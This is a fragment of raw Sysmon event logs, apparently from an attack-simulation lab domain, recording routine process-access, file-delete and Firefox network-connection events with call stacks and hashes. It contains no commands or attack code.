21:43:43.951{39BD8DE3-0FD9-60CA-8B00-00000000D101}19885768C:\Windows\Explorer.EXE{39BD8DE3-25AB-60CA-8D03-00000000D101}1960C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149536Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:43.951{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883004C:\Windows\Explorer.EXE{39BD8DE3-25AB-60CA-8E03-00000000D101}5300C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149535Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:43.951{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883004C:\Windows\Explorer.EXE{39BD8DE3-25AB-60CA-8E03-00000000D101}5300C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149534Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:43.951{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883004C:\Windows\Explorer.EXE{39BD8DE3-25AB-60CA-8E03-00000000D101}5300C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149533Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:43.951{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883004C:\Windows\Explorer.EXE{39BD8DE3-25AB-60CA-8E03-00000000D101}5300C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000149532Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:43.866{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7517D5300AF66B7A3FFBD282496A9D8,SHA256=8EC01C31FA47145C52C2C6EDCD2AEB3276570F13AB4D050A6295648DAC512906,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000149531Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:43.682{39BD8DE3-131D-60CA-0B01-00000000D101}11926820C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cf80|C:\Program Files\Mozilla Firefox\firefox.exe+2cad3|C:\Program Files\Mozilla Firefox\firefox.exe+40de0|C:\Program Files\Mozilla Firefox\firefox.exe+40adc|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149530Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:43.250{39BD8DE3-131D-60CA-0B01-00000000D101}11926820C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cf80|C:\Program Files\Mozilla Firefox\firefox.exe+2cad3|C:\Program Files\Mozilla Firefox\firefox.exe+40de0|C:\Program Files\Mozilla Firefox\firefox.exe+40adc|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000149529Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:43.080{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FDFA2A607ED631B97426DF37D57B7486,SHA256=FB1A718D5EE410B3CFB64D0E5C071B6DB3ED00FF94E1D8523D1890F278A12B60,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104531Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:44.080{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40BBA0527FA44717C1A081FBE12DBDF4,SHA256=6F16E23697F2852131BCDB008B3F6FFA4C1E2CF1AE90D36D4B8E1DF147E4F9A1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000149542Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:43.078{39BD8DE3-131D-60CA-0B01-00000000D101}1192C:\Program Files\Mozilla Firefox\firefox.exeWIN-HOST-14\Administratortcptruefalse10.0.1.15win-host-14.attackrange.local58335-false52.88.2.59ec2-52-88-2-59.us-west-2.compute.amazonaws.com443https 354300x8000000000000000149541Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:42.978{39BD8DE3-131D-60CA-0B01-00000000D101}1192C:\Program Files\Mozilla Firefox\firefox.exeWIN-HOST-14\Administratortcptruefalse10.0.1.15win-host-14.attackrange.local58334-false52.84.169.62server-52-84-169-62.sea19.r.cloudfront.net443https 23542300x8000000000000000149540Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:44.866{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF39BA2CA7F13D6417C2254436B95095,SHA256=E1E01D777074CF7E4E6D49DAD207419B53AFA5B3A7EC20D2BF2DD46A3E403329,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149539Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:44.167{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3C8FF9C1A57925AD95007F6DE3F7BF24,SHA256=12178BB74465971082AC36D8841F2CC02CD357788C07DE0EE0B12465AA40E89C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104532Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:45.437{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1184C755A2C6930F58477F3F046B2031,SHA256=0FD63768DD4B8D2EE8952A8D49C60DB6AA3D83276FA6EB7640A4E90132209495,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149543Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:45.881{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37064F2F7BB723BF57E59BCE2F3F9ED0,SHA256=E07AA5D245ED39AF68177FE0F3B1401C5005347CD90A8AA6B8DE9B4D101E6CBF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104534Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:46.804{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=69D3EF78A499969C4F903FEC9113E4FA,SHA256=C03F2224A9E6E6BDE24AB71A8E914904F0325295B7AC5E59B6932DFE4B263D76,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104533Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:46.803{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22F8DB1D1351540AB53B97319715D5CC,SHA256=C9128D4606235FE647C915F8FA6E4354D33EDC0B6F41E4FD735D71A0BC1F9554,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149645Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.882{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35EDEF018587509BB6D2FB3C05B16CFB,SHA256=68C098B2CC365C44945E3BF2B5CCD8325980129A24DCBADF6E206993B60BB1FB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000149644Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.813{39BD8DE3-0FD9-60CA-8B00-00000000D101}19885768C:\Windows\Explorer.EXE{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149643Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.813{39BD8DE3-0FD9-60CA-8B00-00000000D101}19885768C:\Windows\Explorer.EXE{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000149642Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.813{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B26CEC1D00B9665E2E91139C4A073A68,SHA256=E29CA7E668910E418C589CC6FB41A8AE3675C57D357AAB926F9C2D899B19F2E9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000149641Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.797{39BD8DE3-0FD9-60CA-8B00-00000000D101}19885768C:\Windows\Explorer.EXE{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149640Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.797{39BD8DE3-0FD9-60CA-8700-00000000D101}32161156C:\Windows\system32\taskhostw.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149639Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.750{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883004C:\Windows\Explorer.EXE{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149638Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.746{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883864C:\Windows\Explorer.EXE{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x8000000000000000149637Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.746{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883864C:\Windows\Explorer.EXE{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x8000000000000000149636Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.745{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883864C:\Windows\Explorer.EXE{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba4b0|C:\Windows\System32\TwinUI.dll+b9dbe|C:\Windows\System32\TwinUI.dll+211f10|C:\Windows\System32\TwinUI.dll+ba600|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x8000000000000000149635Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.745{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883864C:\Windows\Explorer.EXE{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba4b0|C:\Windows\System32\TwinUI.dll+b9dbe|C:\Windows\System32\TwinUI.dll+211f10|C:\Windows\System32\TwinUI.dll+ba600|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x8000000000000000149634Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.729{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883864C:\Windows\Explorer.EXE{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+ace56|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149633Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.729{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883864C:\Windows\Explorer.EXE{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+ace56|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149632Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.667{39BD8DE3-0FD9-60CA-8400-00000000D101}37206492C:\Windows\System32\RuntimeBroker.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149631Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.667{39BD8DE3-0FD9-60CA-8400-00000000D101}37206492C:\Windows\System32\RuntimeBroker.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149630Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 